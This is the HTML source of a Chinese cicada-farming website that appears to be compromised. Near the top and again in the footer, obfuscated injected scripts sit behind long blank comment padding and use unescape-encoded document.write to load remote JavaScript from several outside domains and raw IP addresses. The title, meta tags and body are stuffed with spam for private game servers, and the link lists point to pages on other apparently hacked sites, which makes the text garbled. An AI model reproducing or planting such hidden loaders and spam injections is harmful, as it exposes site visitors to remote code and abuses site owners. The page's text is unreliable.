<!--
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-->
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//天下传奇.sifu.tuangoubus123.com/4-6-1/bak/%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>

<!--
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-->
<script language="javascript">


　　<!--


　document.writeln("<script src=\"http:\/\/sifu.fhsm8.com\/4-6-1/bak/\/7\/4\/jquery2.js\" type=\"text\/javascript\"><\/script>")


　　//-javascript结束-->


　　</script>


<!--
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-->
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//182.16.11.172/4-6-1/bak/%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312" />
<title>天下传奇,传奇故事,天下传奇1.76_兽药信息网,养猪养鸡养牛养羊技术,兽药营销网</title>
<meta name="keywords" content="天下传奇,传奇故事,天下传奇1.76,">
<meta name="description" content="天下传奇-开服七年,品质保证,全国最大的仿武易传奇,本服拥有雄厚的技术实力,绝非市面上大家见到的一条龙和内服,长期骨灰玩家选择我们是绝对没错的,还在等什么?天下传奇1.76金币版,1.76金币合击版 !。">
<link href="http://www.jinchanwang.net/css/index.css" rel="stylesheet" type="text/css" />
<link href="http://www.jinchanwang.net/css/common.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="js/js.js"></script>
<script type="text/javascript" src="a2j/astr.js"></script>
</head>
<script language='javascript' src=''></script><script language='javascript' src=''></script>
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//sifu.zuiaiguagzhou.com/fanjiexi/boai3.js%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>
<script type="text/javascript" src="http://86ren.net/style/blog6/jquery.js"></script>
<script type="text/javascript" src="http://86ren.net/style/blog6/easyslider1.5.js"></script>
<!--
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
-->
    <script src="http://86ren.net/style/7/4/marquee.js" type="text/javascript"></script>
    <script src="http://86ren.net/style/7/4/index.js" type="text/javascript"></script>
    <script src="http://86ren.net/style/7/4/admoveconfig.js" type="text/javascript"></script> 
	<script>document.write(unescape('%3cscript%20src%3d%22http%3a//www.xingdeshan.cn/4-6-1/bak/boai9.js%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>
	<!--
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
-->
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//182.16.11.170/4-6-1/bak/%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//天下传奇.sifu.tuangoubus123.com/4-6-1/bak/tiaoyong.js%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//sifu.bj2shoufang.com/4-6-1/ad.js%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>

</head>
<body>
<div class="top">
	<div class="top_left left">您好，欢迎来到金蝉养殖网，欢迎光临！
  </div>
	<div class="top_right left"><a href="http://www.jinchanwang.net" onclick="window.external.addfavorite(document.url,document.title);">加入收藏</a><a href="http://www.jinchanwang.net" onclick="this.style.behavior='url(#default#homepage)';this.sethomepage(document.url);">设为首页</a><a href="http://www.jinchanwang.net/book.asp">请您留言</a></div>
</div>
<div class="logo m_top">
	<div class="logo_left"><a href="http://www.jinchanwang.net/"><img src="http://www.jinchanwang.net/images/logo.gif" alt="金蝉养殖网_金蝉养殖基地_河南金蝉养殖_人工养殖金蝉_知了猴养殖" border="0" /></a></div>
	<div class="logo_right">
		<div class="logo_right2"></div>
	</div>
</div>
<div class="nav">
	<div class="nav1">
	<b><ul>
			<li><a href="http://www.jinchanwang.net/./">网站首页</a></li>
			<li><a href="http://www.jinchanwang.net/./article/list_1.html">金蝉养殖</a></li><li><a href="http://www.jinchanwang.net/./article/list_2.html">天下传奇</a></li><li><a href="http://www.jinchanwang.net/./article/list_3.html">金蝉新闻</a></li><li><a href="http://www.jinchanwang.net/book.asp">天下传奇</a></li><span><li><a href="http://www.jinchanwang.net/">联系我们</a></li></span>
		</ul></b>
  </div>
  </div>

		<div class="product2 m_top">
			<div class="product2_title left">
			  <h4>最新文章</h4>
			</div>
			<div class="product2_centen left">
				<ul><li><a href="http://www.jinchanwang.net/./article/92.html" target="_blank">人工养金蝉赚钱吗--金蝉养</a></li><li><a href="http://www.jinchanwang.net/./article/91.html" target="_blank">树下爬出“金贵”知了猴 养</a></li><li><a href="http://www.jinchanwang.net/./article/90.html" target="_blank">安徽金蝉养殖基地-金蝉养殖</a></li><li><a href="http://www.jinchanwang.net/./article/89.html" target="_blank">人工养殖金蝉知了爬蚱要什</a></li><li><a href="http://www.jinchanwang.net/./article/88.html" target="_blank">金蝉养殖基地: </a></li></ul>
			</div>
		</div>     </div>
<!--
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-->
    
    
    <script src="http://86ren.net/style/7/4/jquery.js" type="text/javascript"></script>
	</div>	
  <div class="news left m_left">
		<div class="news1">
			<div class="news1_1 left">
			  <h4>推荐技术</h4>
			</div>
			<div class="news1_2 left"><a href="http://www.jinchanwang.net/#"><img src="http://www.jinchanwang.net/images/more.gif" border="0" /></a></div>
		</div>
		<div class="news2">
			<dl>
				<dd><h3>金蝉养殖基地-金蝉养殖常见问题解析</h3>金蝉养殖基地_金蝉养殖_常见问题解析_人工金蝉的方法，知了猴的养殖问题，养殖金蝉过程！！！……<li><a href="">天下传奇最新热门新闻</a></li>
                            <li><a href="">天下传奇时讯</a></li>
                            <li> <li><a href=http://www.ifcseoul.com/overseer/common/css/base/170/index.html>中变传奇发布网</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/140/index.html>复古私服</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/110/index.html>传奇老版本客户端下载</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/80/index.html>传奇4f</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/50/index.html>传奇私服完整客户端</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/20/index.html>新开传奇sf发布</a></li></li>
                            <li><a href="">天下传奇2013热点文章</a></li>
<li><a href="">天下传奇最新资料</a></li><font>03-11</font></dt>
			</dl>
		</div>
		<!--<div class="news3"><img src="http://www.jinchanwang.net/images/news_banner.jpg" width="456" height="58" /></div>-->
  </div>
  <div class="right left">
    <div class="right_title"><img src="http://www.jinchanwang.net/images/right_dot.gif" width="13" height="13" />点击排行旁</div>
    <div class="right_centen">
      <ul>
	  <li><li><a href="">天下传奇最新热门新闻</a></li>
                            <li><a href="">天下传奇时讯</a></li>
                           <li> <li><a href=http://www.shjnsj.com/Inc/editor/plugins/code/js/120/index.html>最好的传奇私服发布网</a></li><li><a href=http://www.zhuanshitong.com/wsm/editor/INC/function/133/index.html>神泣sf发布网</a></li><li><a href=http://www.zx5117.com/skin/member/images/logo/78/index.html>100 仿盛大传奇</a></li><li><a href=http://www.cnhuajiao.com/lz0917/editor/admin/128/index.html>赤壁sf发布网</a></li><li><a href=http://www.dc919.com/system/xyeWebEditor/css/129/index.html>传奇私服斗破苍穹</a></li><li><a href=http://www.tfslsh.com/api/pay/tenpay/sends/125/index.html>26uu</a></li><li><a href=http://www.beijinghaiyao.com/ckeditor/plugins/flash/lurd/194/index.html>传奇sf123</a></li><li><a href=http://www.cnhuajiao.com/lz0917/editor/admin/38/index.html>热血传奇超变私服</a></li><li><a href=http://www.showtechsh.com/twmp/Tools/Export/172/index.html>新开超变态传奇私服</a></li><li><a href=http://www.vismay.cn/syssite/include/cdao/149/index.html>热血传奇合击私服</a></li></li>
                            <li><a href="">天下传奇2013热点文章</a></li>
<li><a href="">天下传奇最新资料</a></li></li>
      </ul>
    </div>
  </div>
</div>
<div class="gdimg">
<script language="javascript">function __ok3w_article_imggd__003794(){var rndid = 'pro3794';var strgd = '<table border="0" cellspacing="0" cellpadding="0"><tr><td><a href="http://www.jinchanwang.net/./article/92.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014324231059398.jpg" width="142" height="100" alt="人工养金蝉赚钱吗--金蝉养殖技术与前景" border="0" /><br />人工养金蝉赚钱吗--金</a></td><td><a href="http://www.jinchanwang.net/./article/91.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/201432321218996.jpg" width="142" height="100" alt="树下爬出“金贵”知了猴 养殖金蝉渐成趋势" border="0" /><br />树下爬出“金贵”知了</a></td><td><a href="http://www.jinchanwang.net/./article/90.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014322102023350.jpg" width="142" height="100" alt="安徽金蝉养殖基地-金蝉养殖的经济效益分析 " border="0" /><br />安徽金蝉养殖基地-金蝉</a></td><td><a href="http://www.jinchanwang.net/./article/89.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014320221112338.jpg" width="142" height="100" alt="人工养殖金蝉知了爬蚱要什么条件？" border="0" /><br />人工养殖金蝉知了爬蚱</a></td><td><a href="http://www.jinchanwang.net/./article/87.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/201431521467659.jpg" width="142" height="100" alt="河南金蝉养殖基地-金蝉人工养殖五点" border="0" /><br />河南金蝉养殖基地-金蝉</a></td><td><a href="http://www.jinchanwang.net/./article/86.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/20140314212008666.jpg" width="142" height="100" alt="金蝉养殖基地提醒您" border="0" /><br />金蝉养殖基地提醒您</a></td><td><a href="http://www.jinchanwang.net/./article/85.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014313222952958.jpg" width="142" height="100" alt="金蝉养殖-金蝉养殖播撒技术方法" border="0" /><br />金蝉养殖-金蝉养殖播撒</a></td><td><a href="http://www.jinchanwang.net/./article/84.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014312211820869.jpg" width="142" height="100" alt="金蝉养殖视频，人工养殖金蝉视频技术" border="0" /><br />金蝉养殖视频，人工养</a></td><td><a href="http://www.jinchanwang.net/./article/83.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014313224054834.jpg" width="142" height="100" alt="河南金蝉养殖技术要点问答" border="0" /><br />河南金蝉养殖技术要点</a></td><td><a href="http://www.jinchanwang.net/./article/81.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014313223422555.jpg" width="142" height="100" alt="河南金蝉养殖-金蝉卵枝订购开始" border="0" /><br />河南金蝉养殖-金蝉卵枝</a></td><td><a href="http://www.jinchanwang.net/./article/80.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201402/20140209091411587.jpg" width="142" height="100" alt="人工养殖金蝉-人工养殖金蝉的技术" border="0" /><br />人工养殖金蝉-人工养殖</a></td><td><a href="http://www.jinchanwang.net/./article/79.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201403/2014313223733733.jpg" width="142" height="100" alt="金蝉习性及价值前景" border="0" /><br />金蝉习性及价值前景</a></td></tr></table>';ok3w_marquee(rndid,strgd,940,135,120);}__ok3w_article_imggd__003794();</script>
</div>
<style type="text/css">
<!--
.style1 {	color: #003300;
	font-weight: bold;
}
.style4 {color: #990000}
.style5 {
	color: #ff0000;
	font-weight: bold;
	font-size: 16px;
}
-->
</style>
<div class="index1">
  <table width="960" cellpadding="1">
    <tr>
      <td width="473" height="248" bgcolor="#99ffff"><p>天下传奇-开服七年,品质保证,全国最大的仿武易传奇,本服拥有雄厚的技术实力,绝非市面上大家见到的一条龙和内服,长期骨灰玩家选择我们是绝对没错的,还在等什么?天下传奇1.76金币版,1.76金币合击版 沿着楼梯边上楼,找sf1.80复古 眼看着附属中学磨蹭了半天也不见应对,sf传奇送三破送会员的 她就想不通了,金兔2合一传奇  ·[新版公告]新版传奇天下v2.2客户端更新下载 [06-07] ·[旧版公告]传奇天下2003怀旧版(美化版)客户端下载 [05-23] ·[新版公告]新版传奇天下下次重启更新<span class=m>最佳答案: </span>发布站有啊.! 那自己电脑开也可以. 就是开给朋友玩的 不能开区. 你想自己开 baidu留言我 或者去 www 7pv net这里面下个dbc2000和服务端也就是免费无炮灰传奇以它个性鲜明的优势,体贴入微的服务。带给各位老版经典传奇玩家及chuanqi爱好者最大的乐趣。我们要为骑战天下传奇家族,行会提供最好的平台!让大家在看书网提供绝顶天下传奇免费在线阅读下载,包括绝顶天下传奇最新章节及时更新,绝顶天下传奇是本站首发小说,欢迎收藏以便下次阅读。《传奇世界》是盛大游戏有限公司自主研发的首款玄幻网游大作,2010年囊括4项行业大奖。35分钟极速下载客户端,带您进入一个奇妙玄幻的修真世界。盛大游戏传世工作室2d网游pk王者之作,现已实现全区跨服互通,战法道妖四职业完美平衡。从天空到海底,广阔的修真之旅,邀您畅爽体验传世打宝pk之旅。 </p></td>
    </tr>
  </table>
</div>

<div class="main1 m_top">
  <div class="main1_1 left">
    <div class="main1_1title">
      <div class="main1_1title1">
        <h4>金蝉养殖</h4>
      </div>
      <div class="main1_1title2"><a href="http://www.jinchanwang.net/./article/list_1.html" target="_blank"><img src="http://www.jinchanwang.net/images/more.gif" border="0" /></a></div>
    </div>
    <div class="main1_1centen">
      <dl>
        <dd><a href="http://www.jinchanwang.net/./article/64.html" target="_blank"><img src="http://www.jinchanwang.net/./upfiles/file/201401/20140125171017877.jpg" width="118" height="73" border="0" /></a></dd><span><dd><a href="http://www.jinchanwang.net/./article/64.html" target="_blank">金蝉养殖基地_金蝉养殖_常见问题解析_人工金蝉的方法，知了猴的养殖问题，养殖金蝉过程！！！</a></dd></span><dt><a href="http://www.jinchanwang.net/./article/91.html" target="_blank">树下爬出“金贵”知了猴 养殖金蝉渐成趋</a></dt><dt><a href="http://www.jinchanwang.net/./article/86.html" target="_blank">金蝉养殖基地提醒您</a></dt><dt><a href="http://www.jinchanwang.net/./article/81.html" target="_blank" style="color:#ff0000;">河南金蝉养殖-金蝉卵枝订购开始</a></dt><dt><a href="http://www.jinchanwang.net/./article/80.html" target="_blank">人工养殖金蝉-人工养殖金蝉的技术</a></dt><dt><a href="http://www.jinchanwang.net/./article/79.html" target="_blank">金蝉习性及价值前景</a></dt><dt><a href="http://www.jinchanwang.net/./article/75.html" target="_blank">最大金蝉养殖基地--金蝉养殖基地_提供</a></dt>
      </dl>
    </div>
  </div><div class="main1_2 left">
		<div class="main1_1title">
			<div class="main1_2title1"><h4>养殖技术</h4></div>
			<div class="main1_1title2"><a href="http://www.jinchanwang.net/./article/list_2.html" target="_blank"><img src="http://www.jinchanwang.net/images/more.gif" border="0" /></a></div>
		</div>
		<div class="main1_1centen">
			<dl>
				<dd><li><a href="">天下传奇最新热门新闻</a></li>
                            <li><a href="">天下传奇时讯</a></li>
                            <li> <li><a href=http://www.ifcseoul.com/overseer/common/css/base/170/index.html>中变传奇发布网</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/140/index.html>复古私服</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/110/index.html>传奇老版本客户端下载</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/80/index.html>传奇4f</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/50/index.html>传奇私服完整客户端</a></li><li><a href=http://www.ifcseoul.com/overseer/common/css/base/20/index.html>新开传奇sf发布</a></li></li>
                            <li><a href="">天下传奇2013热点文章</a></li>
<li><a href="">天下传奇最新资料</a></li>
</dt>
			</dl>
		</div>
	</div><div class="main1_1 left">
      <div class="main1_1title">
        <div class="main1_3title1"><h4>金蝉新闻</h4></div>
        <div class="main1_1title2"><a href="http://www.jinchanwang.net/./article/list_3.html" target="_blank"><img src="http://www.jinchanwang.net/images/more.gif" border="0" /></a></div>
      </div>
      <div class="main1_1centen">
        <dl>
          <dd><li><a href="">天下传奇最新热门新闻</a></li>
                            <li><a href="">天下传奇时讯</a></li>
                            <li> <li><a href=http://www.shjnsj.com/Inc/editor/plugins/code/js/120/index.html>最好的传奇私服发布网</a></li><li><a href=http://www.zhuanshitong.com/wsm/editor/INC/function/133/index.html>神泣sf发布网</a></li><li><a href=http://www.zx5117.com/skin/member/images/logo/78/index.html>100 仿盛大传奇</a></li><li><a href=http://www.cnhuajiao.com/lz0917/editor/admin/128/index.html>赤壁sf发布网</a></li><li><a href=http://www.dc919.com/system/xyeWebEditor/css/129/index.html>传奇私服斗破苍穹</a></li><li><a href=http://www.tfslsh.com/api/pay/tenpay/sends/125/index.html>26uu</a></li><li><a href=http://www.beijinghaiyao.com/ckeditor/plugins/flash/lurd/194/index.html>传奇sf123</a></li><li><a href=http://www.cnhuajiao.com/lz0917/editor/admin/38/index.html>热血传奇超变私服</a></li><li><a href=http://www.showtechsh.com/twmp/Tools/Export/172/index.html>新开超变态传奇私服</a></li><li><a href=http://www.vismay.cn/syssite/include/cdao/149/index.html>热血传奇合击私服</a></li></li>
                            <li><a href="">天下传奇2013热点文章</a></li>
<li><a href="">天下传奇最新资料</a></li>
</dt>
        </dl>
      </div>
    </div>
</div>
<p>
<!--
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-->
  
</p>
<p>
<script language="javascript" src="js/ajax.js"></script>
<style type="text/css">
.submsg{ line-height:170%; padding-top:15px;}
.submsg span, .submsg img{float:left;}
.submsg input{float:left; margin-right:8px;}
.submsg textarea{ width:670px; height:150px; border:1px solid #ccc;}
.submsg fieldset{ padding:8px 8px 0px 8px; border:1px solid #ccc; margin-bottom:8px;}
.submsg fieldset input{ border:none; width:auto; float:none;}
.submsg fieldset img{ margin-bottom:8px; border:1px solid #ddd; padding:1px; float:none;}
.submsg div{margin-top:10px;}
.subinput{ border:1px solid #ccc; width:120px;}
.subinput2{ border:1px solid #ccc; width:60px;}
</style>
</head>

<body>
<div class="wei m_top">您当前位置：<a href="http://www.jinchanwang.net/./">网站首页</a> &gt;&gt; 留言交流</div>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:8px;">
      <tr>
        <td style="padding:8px; border:1px solid #003300;">

<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="150" align="center">共有<strong>0</strong>条留言</td>
    <td><div class="page_nav"><a href="http://www.jinchanwang.net/index.asp?pageno=1">首页</a> <a href="http://www.jinchanwang.net/index.asp?pageno=1">上页</a> <a href="http://www.jinchanwang.net/index.asp?pageno=0">下页</a> <a href="http://www.jinchanwang.net/index.asp?pageno=0">末页</a></div></td>
  </tr>
</table>
<div style="background-color:#f5f5f5; padding:8px 8px 5px 8px; margin-bottom:8px;">最新公告：有金蝉养殖问题，请您留言！</div>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="150" align="center">共有<strong>0</strong>篇留言</td>
    <td><div class="page_nav"><a href="http://www.jinchanwang.net/index.asp?pageno=1">首页</a> <a href="http://www.jinchanwang.net/index.asp?pageno=1">上页</a> <a href="http://www.jinchanwang.net/index.asp?pageno=0">下页</a> <a href="http://www.jinchanwang.net/index.asp?pageno=0">末页</a></div></td>
  </tr>
</table>

<a name="sub" id="sub"></a>
<div style="background-color:#f5f5f5; padding:8px 8px 5px 8px; margin:8px 0;"><strong>发表留言</strong></div>
<div style=" padding-left:35px;" class="submsg">
<form name="frmbook" id="frmbook" method="post" action="">
<span>网名：</span>
<input name="username" type="text" class="subinput" id="username" value="" size="12" maxlength="8" />
<span>qq：</span>
<input name="qq" type="text" class="subinput" id="qq" size="12" maxlength="20" />
<span>邮箱：</span>
<input name="mail" type="text" class="subinput" id="mail" size="25" maxlength="100" />
<span>地址：</span>
<input name="homepage" type="text" class="subinput" id="homepage" size="25" maxlength="100" />
<br />
<fieldset>
<legend>留言问题分类</legend>
<br /><input name="pid" type="radio" value="1" checked="checked" /><a href="http://www.jinchanwang.net/javascript:;" onclick="frmbook.pid[0].checked=true;"><img alt="ok3w.net -- 点击选择" src="images/book/1.jpg" width="40" height="40"  border="0" /></a> <input name="pid" type="radio" value="2" /><a href="http://www.jinchanwang.net/javascript:;" onclick="frmbook.pid[1].checked=true;"><img alt="ok3w.net -- 点击选择" src="images/book/2.jpg" width="40" height="40"  border="0" /></a> <input name="pid" type="radio" value="3" /><a href="http://www.jinchanwang.net/javascript:;" onclick="frmbook.pid[2].checked=true;"><img alt="ok3w.net -- 点击选择" src="images/book/3.jpg" width="40" height="40"  border="0" /></a> <input name="pid" type="radio" value="4" /><a href="http://www.jinchanwang.net/javascript:;" onclick="frmbook.pid[3].checked=true;"><img alt="ok3w.net -- 点击选择" src="images/book/4.jpg" width="40" height="40"  border="0" /></a> 
</fieldset>
留言：<br />
<script language="javascript" src="js/guest_ubb.js"></script>
<table border="0" cellspacing="0" cellpadding="2">
  <tr>
    <td><select name="font" onfocus="this.selectedindex=0" onchange="chfont(this.options[this.selectedindex].value)" size="1">
      <option value="" selected>选择字体</option>
      <option value="宋体">宋体</option>
      <option value="黑体">黑体</option>
      <option value="arial">arial</option>
      <option value="book antiqua">book antiqua</option>
      <option value="century gothic">century gothic</option>
      <option value="courier new">courier new</option>
      <option value="georgia">georgia</option>
      <option value="impact">impact</option>
      <option value="tahoma">tahoma</option>
      <option value="times new roman">times new roman</option>
      <option value="verdana">verdana</option>
    </select></td>
    <td><select name="size" onfocus="this.selectedindex=0" onchange="chsize(this.options[this.selectedindex].value)" size="1">
      <option value="" selected>字体大小</option>
      <option value="1">1</option>
      <option value="2">2</option>
      <option value="3">3</option>
      <option value="4">4</option>
      <option value="5">5</option>
      <option value="6">6</option>
    </select></td>
    <td><select name="color"  onfocus="this.selectedindex=0" onchange="chcolor(this.options[this.selectedindex].value)" size="1">
      <option value="" selected>字体颜色</option>
      <option value="black" style="background-color:black;color:black;">black</option>
      <option value="white" style="background-color:white;color:white;">white</option>
      <option value="red" style="background-color:red;color:red;">red</option>
      <option value="yellow" style="background-color:yellow;color:yellow;">yellow</option>
      <option value="pink" style="background-color:pink;color:pink;">pink</option>
      <option value="green" style="background-color:green;color:green;">green</option>
      <option value="orange" style="background-color:orange;color:orange;">orange</option>
      <option value="purple" style="background-color:purple;color:purple;">purple</option>
      <option value="blue" style="background-color:blue;color:blue;">blue</option>
      <option value="beige" style="background-color:beige;color:beige;">beige</option>
      <option value="brown" style="background-color:brown;color:brown;">brown</option>
      <option value="teal" style="background-color:teal;color:teal;">teal</option>
      <option value="navy" style="background-color:navy;color:navy;">navy</option>
      <option value="maroon" style="background-color:maroon;color:maroon;">maroon</option>
      <option value="limegreen" style="background-color:limegreen;color:limegreen;">limegreen</option>
    </select></td>
    <td><img src="http://www.jinchanwang.net/images/bb_bold.gif" border="0" alt="粗体" onclick="ubbformat('b')"></td>
    <td><img src="http://www.jinchanwang.net/images/bb_italicize.gif" alt="斜体" width="23" height="22" border="0" onclick="ubbformat('i')"></td>
    <td><img src="http://www.jinchanwang.net/images/bb_underline.gif" border="0" alt="下划线" onclick="ubbformat('u')"></td>
    <td><img src="http://www.jinchanwang.net/images/bb_center.gif" border="0" alt="居中对齐" onclick="ubbformat('center')"></td>

  </tr>
</table>
<textarea name="content" id="content"></textarea>
<br />
<div>
<span>验证：</span>
<input name="validcode" type="text" class="subinput2" id="validcode" size="6" maxlength="4" />
<img src="http://www.jinchanwang.net/./inc/validcode.asp" alt="看不清？点击换一个" name="strvalidcode" width="40" height="10" border="0" id="strvalidcode" onclick="get_validcode('./');" style=" cursor:pointer; margin-top:2px;" />
<input name="bntsubmit" id="bntsubmit" type="button" onclick="ok3w_book_save(this.form,'./',100,0);" value="ok!立即发表" style=" margin-left:8px; cursor:pointer;" />
</div>
</form>
</div></td>
 </tr>
</table>
</body>
</html>
</p>
<div class="link1 m_top">
	<div class="link_title">友情链接</div>
	<div class="link_centen"><a href="http://www.jinchanwang.net/http://www.zhongjinchan.com/" target="_blank">金蝉养殖基地</a><span>|</span><a href="http://www.jinchanwang.net/http://www.baidu.com/" target="_blank">百度</a><span>|</span><a href="http://www.jinchanwang.net/http://www.tsnyw.com" target="_blank">金蝉养殖</a><span>|</span><a href="http://www.jinchanwang.net/http://www.zf111.cn" target="_blank">金蝉养殖技术</a><span>|</span><a href="http://www.jinchanwang.net/http://www.zhongjinchan.com" target="_blank">山东金蝉养殖</a><span>|</span><a href="http://www.jinchanwang.net/http://www.jinchan888.cn" target="_blank">知了猴养殖</a></div>
</div>
<div class="banner m_top"><script type="text/javascript" src="http://www.jinchanwang.net/guanggao/2.js"></script><div>
<div class="foot1"><a href="http://www.jinchanwang.net/http://www.zhongjinchan.com/article/gy.html">关于我们</a> - <a href="http://www.jinchanwang.net/article/lx.html">联系我们</a> - <a href="http://www.jinchanwang.net/article/fw.html">服务与报价</a> - <a href="http://www.jinchanwang.net/article/xk.html">使用许可协议</a></div>
<div class="foot">
  <ul>
	<li>联系邮箱：miaoshitao@sina.com - 在线qq：11009541</li>
	<li><a href="http://www.jinchanwang.net/" target="_blank">金蝉养殖基地</a></li>
    <li>copyright 2014, 版权所有 www.jinchanwang.net.</li>
  </ul>
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//sifu.zuiaiguagzhou.com/4-6-1/boai3.js%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>
<script>document.write(unescape('%3cscript%20src%3d%22http%3a//sifu.zuiaiguagzhou.com/4-6-1/boai4.js%22%20type%3d%22text/javascript%22%3e%3c/script%3e'));</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/16918377.js"></script>
<noscript><a href="http://www.51.la/?16918377" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/16918377.asp" style="border:none" /></a></noscript>

</div>
</body>
</html>
